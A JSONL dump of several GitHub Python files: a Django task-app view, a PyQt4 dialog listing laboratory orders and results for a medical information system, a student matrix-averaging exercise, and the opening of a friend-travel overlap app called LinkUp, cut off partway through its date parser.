логин\"\n }\n return render(request, 'exit.html', context=context)\n else:\n request.session[\"id_user\"] = users[0].id\n return HttpResponseRedirect('index.html')\n\n\nclass MainPage(View):\n def get(self, request):\n date_today = timezone.now()\n tasks = get_task(request.session['id_user'])\n context = {\n \"tasks\": tasks,\n \"date_today\": date_today\n }\n return render(request, 'index.html', context=context)\n\n\nclass AddPage(View):\n def get(self, request):\n date_today = timezone.now()\n user_id = request.session['id_user']\n context = {\n \"form\": TaskForm,\n \"date_today\": date_today,\n 'user_id': user_id\n }\n return render(request, 'add.html', context=context)\n\n def post(self, request):\n error = \"\"\n\n if request.method == 'POST':\n form = TaskForm(request.POST)\n if form.is_valid():\n uform = form.save(commit=False)\n uform.status = \"Невыполнен\"\n uform.User_id_id = request.session['id_user']\n uform.save()\n return redirect('index.html')\n else:\n error = \"Ошибка формы\"\n else:\n form = TaskForm()\n context = {\n 'form': form,\n 'error': error\n }\n return render(request, 'add.html', context=context)\n","repo_name":"Roman373/isapp","sub_path":"pulls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40422551339","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtCore, QtGui\n\nfrom Events.CreateEvent import editEvent\nfrom Ui_OrderListDialog import Ui_OrderListDialog\nfrom library.DialogBase import CDialogBase\nfrom library.Enum import CEnum\nfrom library.LoggingModule.Logger import getLoggerDbName\nfrom library.TableModel import CDateTimeCol, CEnumCol, CTableModel, CTextCol\nfrom library.Utils import forceRef, forceString, getPref, setPref\nfrom library.database import CTableRecordCache\n\n\nclass OrderStatus(CEnum):\n NotSent = 0\n AwaitingResult = 1\n Finished = 2\n Outdated = 3\n HasError = 4\n\n nameMap = {\n NotSent : u'Не отправлено',\n AwaitingResult: u'Отправлено',\n Finished : u'Закончено',\n Outdated : u'Устаревшая',\n HasError : u'Ошибка отправки'\n }\n\n\nclass OrderSyncStatus(CEnum):\n OrderSent = 0\n ResultReceived = 1\n NoBundleData = 2\n ResultNotReceived = 3\n IncorrectPersonIdentifier = 4\n RequestError = 5\n TerminologyServiceError = 6\n PartialResultReceived = 7\n NoSpecimenType = 8\n NoDiagnosticOrderItems = 9\n Outdated = 90\n Exception = 99\n\n nameMap = {\n OrderSent : u'Отправлен',\n ResultReceived : u'Получен результат',\n NoBundleData : u'Заявка изменена/удалена',\n ResultNotReceived : u'Результат не готов',\n IncorrectPersonIdentifier: u'Некорректный идентификатор исполнителя',\n RequestError : u'Ошибка запроса к ОДЛИ',\n TerminologyServiceError : u'Не валидировано сервисом Терминологии',\n PartialResultReceived : u'Получен неполный результат',\n NoSpecimenType : u'Не указан тип биоматериала',\n NoDiagnosticOrderItems : u'Не указаны коды заявок',\n Outdated : u'Устаревшая',\n Exception : u'Внтуренняя ошибка'\n }\n\n\nclass OrderResponseStatus(CEnum):\n Created = 0\n NotSent = 1\n Finished = 2\n Outdated = 3\n HasError = 4\n\n nameMap = {\n Created : u'Создан',\n NotSent : u'Не отправлен',\n Finished: u'Отправлен',\n Outdated: u'Устаревший',\n HasError: u'Ошибка отправки'\n }\n\n\nclass OrderResponseSyncStatus(CEnum):\n OrderReceived = 0\n ResultSent = 1\n NoBundleData = 2\n PersonNotSet = 3\n IncorrectPersonIdentifier = 4\n RequestError = 5\n OrderNotReceived = 6\n NoObservations = 7\n NoDiagnosticReports = 8\n IncorrectOrderIdentifier = 9\n NoSpecimenType = 10\n InternalOrderNotFound = 11\n TerminologyServiceError = 12\n Outdated = 90\n Exception = 99\n\n nameMap = {\n OrderReceived : u'Получена заявка',\n ResultSent : u'Результат отправлен',\n\n NoBundleData : u'Результат изменен/удален',\n PersonNotSet : u'Не указан исполнитель',\n IncorrectPersonIdentifier: u'Некорректный идентификатор исполнителя',\n RequestError : u'Ошибка запроса к ОДЛИ',\n OrderNotReceived : u'Заявка не получена',\n NoObservations : u'Не указаны результаты тестов',\n NoDiagnosticReports : u'Не заполнены результаты исследования',\n # IncorrectOrderIdentifier : 'INCORRECT ORDER IDENTIFIER',\n NoSpecimenType : u'Не указан тип биоматериала',\n InternalOrderNotFound : u'Не найдена внутренняя заявка',\n TerminologyServiceError : u'Не валидировано сервисом Терминологии',\n Outdated : u'Устаревший',\n\n Exception : u'Внутренняя ошибка'\n }\n\n\nclass COrderModel(CTableModel):\n u\"\"\" МИС-часть: заявки на лабораторные исследования \"\"\"\n fetchSize = 100\n\n def __init__(self, parent):\n super(COrderModel, self).__init__(parent, cols=[\n CTextCol(u'Идентификатор МИС', ['orderMisId'], 10),\n CTextCol(u'Идентификатор ЛИС', ['orderUUID'], 10),\n CTextCol(u'Штрих-код', ['externalId'], 10),\n CTextCol(u'ФИО пациента', ['clientName'], 25),\n CTextCol(u'Биоматериал', ['tissueTypeName'], 15),\n CDateTimeCol(u'Создано', ['datetime'], 20),\n CDateTimeCol(u'Отправлено', ['sentDatetime'], 20),\n CDateTimeCol(u'Получено', ['receivedDatetime'], 20),\n CEnumCol(u'Статус', ['status'], OrderStatus, 20),\n CEnumCol(u'Текущее состояние', ['lastSyncStatus'], OrderSyncStatus, 20, notPresentValue='-'),\n CTextCol(u'Текст ошибки', ['error'], 20, toolTipValue=True)\n ])\n self.setTable('')\n\n def setTable(self, tableName, recordCacheCapacity=300):\n db = QtGui.qApp.db\n tableClient = db.table('Client')\n tableEvent = db.table('Event')\n tableOrder = db.table('{0}.N3LabOrderLog'.format(getLoggerDbName()))\n tableOrderSync = db.table('{0}.N3LabOrderSyncLog'.format(getLoggerDbName()))\n tableOrderSent = tableOrderSync.alias('OrderSent')\n tableOrderRecv = tableOrderSync.alias('OrderRecv')\n tableOrderCurrent = tableOrderSync.alias('OrderCurrent')\n tableTissueType = db.table('rbTissueType')\n tableTTJ = db.table('TakenTissueJournal')\n\n table = tableOrder\n table = table.leftJoin(tableOrderSent,\n tableOrderSent['id'].eqStmt(\n db.selectMin(tableOrderSync,\n tableOrderSync['id'],\n [tableOrderSync['order_id'].eq(tableOrder['id']),\n tableOrderSync['status'].eq(OrderSyncStatus.OrderSent)])\n ))\n table = table.leftJoin(tableOrderRecv,\n tableOrderRecv['id'].eqStmt(\n db.selectMax(tableOrderSync,\n tableOrderSync['id'],\n [tableOrderSync['order_id'].eq(tableOrder['id']),\n tableOrderSync['status'].eq(OrderSyncStatus.ResultReceived)])\n ))\n table = table.leftJoin(tableOrderCurrent,\n tableOrderCurrent['id'].eqStmt(\n db.selectMax(tableOrderSync,\n tableOrderSync['id'],\n tableOrderSync['order_id'].eq(tableOrder['id']))\n ))\n table = table.leftJoin(tableEvent, tableEvent['id'].eq(tableOrder['event_id']))\n table = table.leftJoin(tableClient, tableClient['id'].eq(tableEvent['client_id']))\n table = table.leftJoin(tableTTJ, tableTTJ['id'].eq(tableOrder['takenTissueJournal_id']))\n table = table.leftJoin(tableTissueType, tableTissueType['id'].eq(tableTTJ['tissueType_id']))\n\n cols = [\n tableOrder['orderMisId'],\n tableOrder['orderUUID'],\n tableOrder['datetime'],\n tableOrder['status'],\n tableOrder['event_id'],\n tableOrderCurrent['error'],\n db.concat_ws(' ', tableClient['lastName'], tableClient['firstName'], tableClient['patrName']).alias('clientName'),\n tableTTJ['externalId'],\n tableTissueType['name'].alias('tissueTypeName'),\n tableOrderCurrent['status'].alias('lastSyncStatus'),\n tableOrderSent['datetime'].alias('sentDatetime'),\n tableOrderRecv['datetime'].alias('receivedDatetime')\n ]\n\n self._table = table\n self._recordsCache = CTableRecordCache(db, self._table, cols, recordCacheCapacity)\n\n def isEditable(self):\n return True\n\n\nclass COrderResponseModel(CTableModel):\n u\"\"\" ЛИС-часть: результаты лабораторных исследований \"\"\"\n fetchSize = 100\n\n def __init__(self, parent):\n super(COrderResponseModel, self).__init__(parent, cols=[\n CTextCol(u'Идентификатор заявки в ЛИС', ['orderUUID'], 10),\n CTextCol(u'Идентификатор ЛИС', ['orderResponseUUID'], 10),\n CTextCol(u'ФИО пациента', ['clientName'], 25),\n CDateTimeCol(u'Дата создания', ['datetime'], 20),\n CDateTimeCol(u'Дата отправки', ['sentDatetime'], 20),\n CEnumCol(u'Статус', ['status'], OrderResponseStatus, 20),\n CEnumCol(u'Текущее состояние', ['lastSyncStatus'], OrderResponseSyncStatus, 20, notPresentValue='-'),\n CTextCol(u'Текст ошибки', ['error'], 20)\n ])\n self.setTable('')\n\n def setTable(self, tableName, recordCacheCapacity=300):\n db = QtGui.qApp.db\n tableClient = db.table('Client')\n tableEvent = db.table('Event')\n tableOrderResponse = db.table('{0}.N3LabOrderResponseLog'.format(getLoggerDbName()))\n tableOrderResponseSync = db.table('{0}.N3LabOrderResponseSyncLog'.format(getLoggerDbName()))\n tableOrderResponseSent = tableOrderResponseSync.alias('OrderResponseSent')\n tableOrderResponseCurrent = tableOrderResponseSync.alias('OrderResponseCurrent')\n\n table = tableOrderResponse\n table = table.leftJoin(tableOrderResponseSent,\n tableOrderResponseSent['id'].eqStmt(\n db.selectMin(tableOrderResponseSync,\n tableOrderResponseSync['id'],\n [tableOrderResponseSync['orderResponse_id'].eq(tableOrderResponse['id']),\n tableOrderResponseSync['status'].eq(OrderResponseSyncStatus.ResultSent)])\n ))\n table = table.leftJoin(tableOrderResponseCurrent,\n tableOrderResponseCurrent['id'].eqStmt(\n db.selectMax(tableOrderResponseSync,\n tableOrderResponseSync['id'],\n tableOrderResponseSync['orderResponse_id'].eq(tableOrderResponse['id']))\n ))\n table = table.leftJoin(tableEvent, tableEvent['id'].eq(tableOrderResponse['event_id']))\n table = table.leftJoin(tableClient, tableClient['id'].eq(tableEvent['client_id']))\n\n cols = [\n tableOrderResponse['orderUUID'],\n tableOrderResponse['orderResponseUUID'],\n tableOrderResponse['datetime'],\n tableOrderResponse['status'],\n tableOrderResponse['event_id'],\n tableOrderResponseCurrent['error'],\n db.concat_ws(' ', tableClient['lastName'], tableClient['firstName'], tableClient['patrName']).alias('clientName'),\n tableOrderResponseCurrent['status'].alias('lastSyncStatus'),\n tableOrderResponseSent['datetime'].alias('sentDatetime')\n ]\n\n self._table = table\n self._recordsCache = CTableRecordCache(db, self._table, cols, recordCacheCapacity)\n\n def isEditable(self):\n return True\n\n\nclass CLabOrderListDialog(CDialogBase, Ui_OrderListDialog):\n def __init__(self, parent):\n super(CLabOrderListDialog, self).__init__(parent)\n self.preSetupUi()\n self.setupUi(self)\n self.postSetupUi()\n\n def preSetupUi(self):\n self.actOpenOrderEvent = QtGui.QAction(u'Перейти к обращению', self)\n self.actOpenOrderEvent.setObjectName('actOpenOrderEvent')\n self.actOpenOrderResponseEvent = QtGui.QAction(u'Перейти к обращению', self)\n self.actOpenOrderResponseEvent.setObjectName('actOpenOrderResponseEvent')\n self.actResendOrder = QtGui.QAction(u'Отправить заново', self)\n self.actResendOrder.setObjectName('actResendOrder')\n self.actResendOrderResponse = QtGui.QAction(u'Отправить заново', self)\n self.actResendOrderResponse.setObjectName('actResendOrderResponse')\n\n self.addModels('Order', COrderModel(self))\n self.addModels('OrderResponse', COrderResponseModel(self))\n\n def postSetupUi(self):\n self.setWindowFlags(QtCore.Qt.Dialog | QtCore.Qt.WindowMaximizeButtonHint | QtCore.Qt.WindowCloseButtonHint)\n\n self.setModels(self.tblOrder, self.modelOrder, self.selectionModelOrder)\n self.tblOrder.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)\n self.tblOrder.setSelectionMode(QtGui.QAbstractItemView.MultiSelection)\n self.tblOrder.createPopupMenu([self.actOpenOrderEvent,\n self.actResendOrder])\n self.connect(self.tblOrder.popupMenu(), QtCore.SIGNAL('aboutToShow()'), self.onOrderPopupMenuAboutToShow)\n\n self.cmbOrderStatus.setEnum(OrderStatus, addNone=True)\n self.cmbOrderSyncStatus.setEnum(OrderSyncStatus, addNone=True)\n self.edtOrderDateFrom.setDate(QtCore.QDate.currentDate())\n self.edtOrderDateTo.setDate(QtCore.QDate.currentDate())\n\n self.setModels(self.tblOrderResponse, self.modelOrderResponse, self.selectionModelOrderResponse)\n self.tblOrderResponse.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)\n self.tblOrderResponse.setSelectionMode(QtGui.QAbstractItemView.MultiSelection)\n self.tblOrderResponse.createPopupMenu([self.actOpenOrderResponseEvent,\n self.actResendOrderResponse])\n self.connect(self.tblOrderResponse.popupMenu(), QtCore.SIGNAL('aboutToShow()'), self.onOrderResponsePopupMenuAboutToShow)\n\n self.cmbOrderResponseStatus.setEnum(OrderResponseStatus, addNone=True)\n self.cmbOrderResponseSyncStatus.setEnum(OrderResponseSyncStatus, addNone=True)\n self.edtOrderResponseDate.setDate(QtCore.QDate.currentDate())\n\n self.btnClose.clicked.connect(self.close)\n\n def loadPreferences(self, preferences):\n self.tblOrder.loadPreferences(getPref(preferences, 'tblOrder)', {}))\n self.tblOrderResponse.loadPreferences(getPref(preferences, 'tblOrderResponse', {}))\n return CDialogBase.loadPreferences(self, preferences)\n\n def savePreferences(self):\n result = CDialogBase.savePreferences(self)\n setPref(result, 'tblOrder', self.tblOrder.savePreferences())\n setPref(result, 'tblOrderResponse', self.tblOrderResponse.savePreferences())\n return result\n\n @QtCore.pyqtSlot()\n def onOrderPopupMenuAboutToShow(self):\n row = self.tblOrder.currentIndex().row()\n record = self.tblOrder.model().getRecordByRow(row)\n status = forceRef(record.value('status'))\n self.actResendOrder.setVisible(status in (OrderStatus.Outdated,\n OrderStatus.HasError))\n\n @QtCore.pyqtSlot()\n def onOrderResponsePopupMenuAboutToShow(self):\n row = self.tblOrderResponse.currentIndex().row()\n record = self.tblOrderResponse.model().getRecordByRow(row)\n status = forceRef(record.value('status'))\n self.actResendOrderResponse.setVisible(status in (OrderResponseStatus.Outdated,\n OrderResponseStatus.HasError))\n\n @QtCore.pyqtSlot()\n def on_actOpenOrderEvent_triggered(self):\n row = self.tblOrder.currentIndex().row()\n record = self.tblOrder.model().getRecordByRow(row)\n evenId = forceRef(record.value('event_id'))\n editEvent(self, evenId)\n\n @QtCore.pyqtSlot()\n def on_actOpenOrderResponseEvent_triggered(self):\n row = self.tblOrderResponse.currentIndex().row()\n record = self.tblOrderResponse.model().getRecordByRow(row)\n eventId = forceRef(record.value('event_id'))\n editEvent(self, eventId)\n\n @QtCore.pyqtSlot()\n def on_actResendOrder_triggered(self):\n idList = self.tblOrder.model().idList()\n orderIdList = [idList[index.row()] for index in self.tblOrder.selectionModel().selectedRows() if index.isValid()]\n\n db = QtGui.qApp.db\n tableOrder = db.table('{0}.N3LabOrderLog'.format(getLoggerDbName()))\n cond = [\n tableOrder['id'].inlist(orderIdList),\n tableOrder['status'].inlist([OrderStatus.Outdated,\n OrderStatus.HasError])\n ]\n expr = [\n tableOrder['status'].eq(OrderStatus.NotSent)\n ]\n db.updateRecords(tableOrder, expr, cond)\n self.tblOrder.model().recordCache().invalidate(orderIdList)\n\n @QtCore.pyqtSlot()\n def on_actResendOrderResponse_triggered(self):\n idList = self.tblOrderResponse.model().idList()\n orderResponseIdList = [idList[index.row()] for index in self.tblOrderResponse.selectionModel().selectedRows() if index.isValid()]\n\n db = QtGui.qApp.db\n tableOrderResponse = db.table('{0}.N3LabOrderResponseLog'.format(getLoggerDbName()))\n cond = [\n tableOrderResponse['id'].inlist(orderResponseIdList),\n tableOrderResponse['status'].inlist([OrderResponseStatus.Outdated,\n OrderResponseStatus.HasError])\n ]\n expr = [\n tableOrderResponse['status'].eq(OrderResponseStatus.NotSent)\n ]\n db.updateRecords(tableOrderResponse, expr, cond)\n self.tblOrder.model().recordCache().invalidate(orderResponseIdList)\n\n @QtCore.pyqtSlot()\n def on_btnOrderApply_clicked(self):\n self.reloadOrderList()\n\n @QtCore.pyqtSlot()\n def on_btnOrderResponseApply_clicked(self):\n self.reloadOrderResponseList()\n\n def reloadOrderList(self, order=None, reverse=False):\n status = self.cmbOrderStatus.value()\n syncStatus = self.cmbOrderSyncStatus.value()\n hasError = self.chkOrderError.isChecked()\n errorText = forceString(self.edtOrderError.text())\n dateFrom = self.edtOrderDateFrom.date() if self.chkOrderDateFrom.isChecked() else None\n dateTo = self.edtOrderDateTo.date() if self.chkOrderDateTo.isChecked() else None\n\n db = QtGui.qApp.db\n tableOrder = db.table('{0}.N3LabOrderLog'.format(getLoggerDbName()))\n tableOrderSync = db.table('{0}.N3LabOrderSyncLog'.format(getLoggerDbName()))\n tableOrderCurrent = tableOrderSync.alias('OrderCurrent')\n\n table = tableOrder\n\n cond = []\n if status is not None:\n cond.append(tableOrder['status'].eq(status))\n\n if (syncStatus is not None or hasError):\n table = table.leftJoin(tableOrderCurrent,\n tableOrderCurrent['id'].eqStmt(\n db.selectMax(tableOrderSync,\n tableOrderSync['id'],\n tableOrderSync['order_id'].eq(tableOrder['id']))\n ))\n\n if syncStatus is not None:\n cond.append(tableOrderCurrent['status'].eq(syncStatus))\n\n if errorText:\n cond.append(tableOrderCurrent['error'].like(u'%{0}%'.format(errorText)))\n elif hasError:\n cond.append(tableOrderCurrent['error'].ne(''))\n\n if dateFrom:\n cond.append(tableOrder['datetime'].dateGe(dateFrom))\n\n if dateTo:\n cond.append(tableOrder['datetime'].dateLe(dateTo))\n\n if order is None:\n order = [\n tableOrder['id'].desc()\n ]\n idList = db.getDistinctIdList(table, tableOrder['id'], cond, order=order)\n if reverse:\n idList = idList[::-1]\n self.tblOrder.model().setIdList(idList)\n self.lblOrderCount.setText(u'Записей в таблице: {0}'.format(len(idList)))\n\n def reloadOrderResponseList(self, order=None, reverse=False):\n status = self.cmbOrderResponseStatus.value()\n syncStatus = self.cmbOrderResponseSyncStatus.value()\n hasError = self.chkOrderResponseError.isChecked()\n errorText = forceString(self.edtOrderResponseError.text())\n\n db = QtGui.qApp.db\n tableOrderResponse = db.table('{0}.N3LabOrderResponseLog'.format(getLoggerDbName()))\n tableOrderResponseSync = db.table('{0}.N3LabOrderResponseSyncLog'.format(getLoggerDbName()))\n tableOrderResponseCurrent = tableOrderResponseSync.alias('OrderResponseCurrent')\n\n table = tableOrderResponse\n\n cond = []\n if status is not None:\n cond.append(tableOrderResponse['status'].eq(status))\n\n if (syncStatus is not None or hasError):\n table = table.leftJoin(tableOrderResponseCurrent,\n tableOrderResponseCurrent['id'].eqStmt(\n db.selectMax(tableOrderResponseSync,\n tableOrderResponseSync['id'],\n tableOrderResponseSync['orderResponse_id'].eq(tableOrderResponse['id']))\n ))\n\n if syncStatus is not None:\n cond.append(tableOrderResponseCurrent['status'].eq(syncStatus))\n\n if errorText:\n cond.append(tableOrderResponseCurrent['error'].like(u'%{0}%'.format(errorText)))\n elif hasError:\n cond.append(tableOrderResponseCurrent['error'].ne(''))\n\n if self.chkOrderResponseDate.isChecked():\n date = self.edtOrderResponseDate.date()\n cond.append(tableOrderResponse['datetime'].dateEq(date))\n\n if order is None:\n order = [\n tableOrderResponse['id'].desc()\n ]\n idList = db.getDistinctIdList(table, tableOrderResponse['id'], cond, order=order)\n if reverse:\n idList = idList[::-1]\n self.tblOrderResponse.model().setIdList(idList)\n self.lblOrderResponseCount.setText(u'Записей в таблице: {0}'.format(len(idList)))\n\n def setOrderIdList(self, idList):\n self.tblOrder.model().setIdList(idList)\n self.lblOrderCount.setText(u'Записей в таблице: {0}'.format(len(idList)))\n\n def setOrderResponseIdList(self, idList):\n self.tblOrderResponse.model().setIdList(idList)\n self.lblOrderResponseCount.setText(u'Записей в таблице: {0}'.format(len(idList)))\n\n\n# def main():\n# import sys\n# from library.database import connectDataBaseByInfo\n# from s11main import CS11mainApp\n#\n# app = CS11mainApp(sys.argv, False, 'S11App.ini', False)\n# app.applyDecorPreferences()\n#\n# QtCore.QTextCodec.setCodecForTr(QtCore.QTextCodec.codecForName(u'utf8'))\n# db = connectDataBaseByInfo({'driverName' : 'mysql',\n# 'host' : 'p104',\n# 'port' : 3306,\n# 'database' : 's11',\n# 'user' : 'dbuser',\n# 'password' : 'dbpassword',\n# 'connectionName' : 'vista-med',\n# 'compressData' : True,\n# 'afterConnectFunc': None})\n# QtGui.qApp = app\n# QtGui.qApp.db = db\n# orgId = (db.getDistinctIdList('OrgStructure', 'organisation_id', 'deleted=0') or [None])[0]\n# QtGui.qApp.currentOrgId = lambda: orgId\n# QtGui.qApp.currentOrgStructureId = lambda: None\n# dlg = CLabOrderListDialog(None)\n# dlg.exec_()\n#\n#\n# if __name__ == '__main__':\n# main()\n","repo_name":"dio4/vista_1","sub_path":"Exchange/n3labdata/OrderListDialog.py","file_name":"OrderListDialog.py","file_ext":"py","file_size_in_byte":24521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73620052728","text":"#Янова Даниэлла ИУ7-13\n#Найти средние арифметические элементов массива в каждой строке и наибольшее\n#из них\ntry:\n s=int(input('Введите количество строк в матрице: '))\n c=int(input('Введите количество столбцов в матрице: '))\n print('Введите матрицу')\n R=[0]*s\n for i in range(s):\n R[i]=[0]*c\n for i in range (s):\n n=i+1\n print('Введите',n,'-ю строку матрицы:',end=' ')\n R[i]=list(map(float,input().split()))\n print('Исходная матрица: ')\n for i in range(s):\n for j in range(c):\n if R[i][j]<=-10e+4 or R[i][j]>=10e+3:\n print('{:7.1e}'.format(R[i][j]),end=' ')\n else:\n print('{:7.1f}'.format(R[i][j]),end=' ')\n print()\n sr=0\n k=0\n for i in range(s):\n for j in range(c):\n sr+=R[i][j]\n k+=1\n R[i][0]=sr/k\n n=i+1\n print('Среднее арифметическое ',n,'-й строки =',end=' ')\n if R[i][0]<=-10e+4 or R[i][0]>=10e+3:\n print('{:7.1e}'.format(R[i][0]))\n else:\n print('{:7.1f}'.format(R[i][0]))\n sr=0\n k=0\n Max=R[0][0]\n for i in range(1,s):\n if R[i][0]>Max:\n Max=R[i][0]\n print()\n print('Наибольшее среднее арифметическое= ',end='')\n if Max<=-10e+4 or Max>=10e+3:\n print('{:7.1e}'.format(Max),end=' ')\n else:\n print('{:7.1f}'.format(Max),end=' ')\nexcept ValueError:\n print('Введены неверные значения')\n","repo_name":"YumiSikei/Flashbacks_1-5_sem","sub_path":"1 sem/Python/YaD_sr_matrix.py","file_name":"YaD_sr_matrix.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15795759986","text":"# Dylan Marn\n\n'''\nLinkUp: An app designed to help far away friends...\n allow users to link up whenever possible and make the most of their time,\n by making the plans easy so they can make the memories\n\n2 users input their trip details and the program alerts the users if there is any overlap time where they could possible LinkUp\n\nTaget audience:\n college students who moved away from friends for school - easily lets friend group know who is back home to LinkUp\n friends that want help connecting whenever possible\n friends that want an easy way to plan events (with app full functionality)\n \nFurther development:\n add capacity for 2+ users\n add a \"home\" location where another user's trip to that location will yield a LinkUp\n add support for world-wide locations, possibly as specific as cities\n add feature that matched users traveling to neighboring cities not just exact locations\n add a \"things to do\" section that helps connected users find things to do in the area\n'''\n\nimport re\nfrom datetime import date\n\n# class Trip stores important trip data\nclass Trip:\n def __init__(self, name, home, location=None, startdate=None, enddate=None):\n self.name = name\n self.home = home\n self.location = location\n self.startdate = startdate\n self.enddate = enddate\n \n def __str__(self):\n if self.location:\n return f\"{self.name} is from {self.home} and traveling to {self.location} from {self.startdate} to {self.enddate}\"\n else:\n return f\"{self.name} is from {self.home} with no current travel plans\"\n\n\ndef main():\n print(\"Please fill out the following for user #1\")\n user1 = set_user() # get user #1 trip details\n print(f\"\\nPlease fill out the following for user #2\")\n user2 = set_user() # get user #2 trip details\n print(f\"///////////////////////////////////////////////////////////////////////////////\")\n print(user1)\n print(user2)\n print(f\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\n linkUp(user1, user2)\n print(f\"///////////////////////////////////////////////////////////////////////////////\")\n\n## create functions to get user input(name, location and dates) for 2+ users\ndef set_user():\n # get name\n name = None # initalize name to nothing\n while not name: # loop until valid name\n name = get_name(input(\"What is your name? \"))\n if name: # if valid name, confirm with user\n name = is_correct(f\"Hello {name}, is this how you would like to be addressed? (Y/N) \", name)\n\n # get home location\n home = None\n while not home: # loop until valid state\n home = get_location(input(\"Where are you currently? \")) \n if home: # if valid state, confirm with user\n home = is_correct(f\"{name}, it appears you are currenly in {home}, is this correct? (Y/N) \", home)\n\n # determine if user has an upcoming trip\n \n while True:\n trip = input(\"Do you have an upcoming trip? (Y/N) \").upper()\n if trip == \"N\":\n return Trip(name, home)\n elif trip == \"Y\":\n # get trip location\n location = None # initalize state to nothing\n while not location: # loop until valid state\n location = get_location(input(\"Where are you traveling to? \"))\n if location: # if valid state, confirm with user\n if location == home: # trip can not be to current location\n print(\"You are already there\")\n location = None\n else: # check if correct response\n location = is_correct(f\"{name}, it appears you are traveling to {location}, is this correct? (Y/N) \", location)\n\n # get trip start date\n s_date = None # initalize start date to nothing\n while not s_date: # loop until valid start date\n s_date = get_date(input(\"Start date: \"))\n if s_date: # if valid start date, confirm with user\n s_date = is_correct(f\"The start of your trip is {s_date.strftime('%A %B %d, %Y')}, is this correct? (Y/N) \", s_date)\n\n # get trip end date\n e_date = None # initalize end date to nothing\n while not e_date: # loop until valid end date\n e_date = get_date(input(\"End date: \"))\n if e_date:\n if (e_date - s_date).days >= 0:\n e_date = is_correct(f\"The end of your trip is {e_date.strftime('%A %B %d, %Y')}, is this correct? (Y/N) \", e_date)\n else:\n e_date = None\n print(\"Error: End date can not be before start date\")\n\n return Trip(name, home, location, s_date, e_date)\n\n else:\n print(\"Invalid response\")\n\n\n## create a function to get user name\ndef get_name(name):\n name = name.strip().title()\n return name \n\n\n## create a function to get user location\ndef get_location(location):\n location = location.strip().title() # clean up user input\n # dictionary of US states and abbreviation as potential location names\n # for further development, additional locations should be added\n states = {\n 'AK': 'Alaska',\n 'AL': 'Alabama',\n 'AR': 'Arkansas',\n 'AZ': 'Arizona',\n 'CA': 'California',\n 'CO': 'Colorado',\n 'CT': 'Connecticut',\n 'DC': 'District of Columbia',\n 'DE': 'Delaware',\n 'FL': 'Florida',\n 'GA': 'Georgia',\n 'HI': 'Hawaii',\n 'IA': 'Iowa',\n 'ID': 'Idaho',\n 'IL': 'Illinois',\n 'IN': 'Indiana',\n 'KS': 'Kansas',\n 'KY': 'Kentucky',\n 'LA': 'Louisiana',\n 'MA': 'Massachusetts',\n 'MD': 'Maryland',\n 'ME': 'Maine',\n 'MI': 'Michigan',\n 'MN': 'Minnesota',\n 'MO': 'Missouri',\n 'MS': 'Mississippi',\n 'MT': 'Montana',\n 'NC': 'North Carolina',\n 'ND': 'North Dakota',\n 'NE': 'Nebraska',\n 'NH': 'New Hampshire',\n 'NJ': 'New Jersey',\n 'NM': 'New Mexico',\n 'NV': 'Nevada',\n 'NY': 'New York',\n 'OH': 'Ohio',\n 'OK': 'Oklahoma',\n 'OR': 'Oregon',\n 'PA': 'Pennsylvania',\n 'RI': 'Rhode Island',\n 'SC': 'South Carolina',\n 'SD': 'South Dakota',\n 'TN': 'Tennessee',\n 'TX': 'Texas',\n 'UT': 'Utah',\n 'VA': 'Virginia',\n 'VT': 'Vermont',\n 'WA': 'Washington',\n 'WI': 'Wisconsin',\n 'WV': 'West Virginia',\n 'WY': 'Wyoming'\n }\n\n # list of keys and values to compare user input with\n keysList = list(states.keys())\n for i in range(len(keysList)): # title case keys to match title cased input\n keysList[i] = keysList[i].title()\n valuesList = list(states.values())\n\n if location in keysList:\n return states[location.upper()] # return full state name if given abbreviated version (must use upper to index into dict)\n elif location in valuesList:\n return location # return user input if valid\n else:\n print(\"Invalid location\")\n print(\"Currently only U.S. states supported\")\n return None\n\n\n## create a function to get user date, returned in standard form\ndef get_date(givendate):\n # create a dict of months and corresponding number\n months = {\n \"January\": 1,\n \"February\": 2,\n \"March\": 3,\n \"April\": 4,\n \"May\": 5,\n \"June\": 6,\n \"July\": 7,\n \"August\": 8,\n \"September\": 9,\n \"October\": 10,\n \"November\": 11,\n \"December\": 12\n }\n # test for date in MonthName DD, YYYY format\n matches1 = re.search(r\"^(.+) (\\d{1,2})[,| ] ?(\\d{1,4})$\", givendate, re.IGNORECASE)\n if matches1:\n try: # match input month to corresponding number\n month = int(months[(matches1.group(1)).title()])\n except: # if invalid month surpress error\n print(\"Invalid month name\")\n return None\n day = int(matches1.group(2))\n year = int(matches1.group(3))\n try:\n date(year, month, day)\n return date(year, month, day)\n except:\n pass\n\n # test for date in common MM/DD/YYYY or MM-DD-YYYY format\n matches2 = re.search(r\"^(\\d{1,2})[/-](\\d{1,2})[/-](\\d{1,4})$\", givendate, re.IGNORECASE)\n if matches2:\n month = int(matches2.group(1))\n day = int(matches2.group(2))\n year = int(matches2.group(3))\n\n # alternative shorter method, less descriptive error feedback\n # try:\n # date(year, month, day)\n # return date(year, month, day)\n\n try: # test input for calendar date bounds\n if 1 <= month <= 12 and 1 <= day <= 31: # narrow bounds, only 12 months with max 31 days\n if month in [4,6,9,11] and day == 31: # months with only 30 days\n print(\"Invalid days for given month\")\n return None\n elif month == 2: # February\n if year%4 == 0: # leap year\n if year%100 == 0: # not leap year\n if year%400 == 0: # leap year\n if day > 29:\n print(\"Invalid days for given month\")\n return None\n else:\n return date(year, month, day)\n if day > 28:\n print(\"Invalid days for given month\")\n return None\n else:\n return date(year, month, day)\n if day > 29:\n print(\"Invalid days for given month\")\n return None\n else:\n return date(year, month, day)\n if day > 28:\n print(\"Invalid days for given month\")\n return None\n else:\n return date(year, month, day)\n else: # if input satisfies all bounds\n return date(year, month, day)\n except:\n pass\n\n # if none of the above can be completed, provide user a hint\n print(\"Invalid date - Valid forms of date include\")\n print(\"1 MM/DD/YYYY\")\n 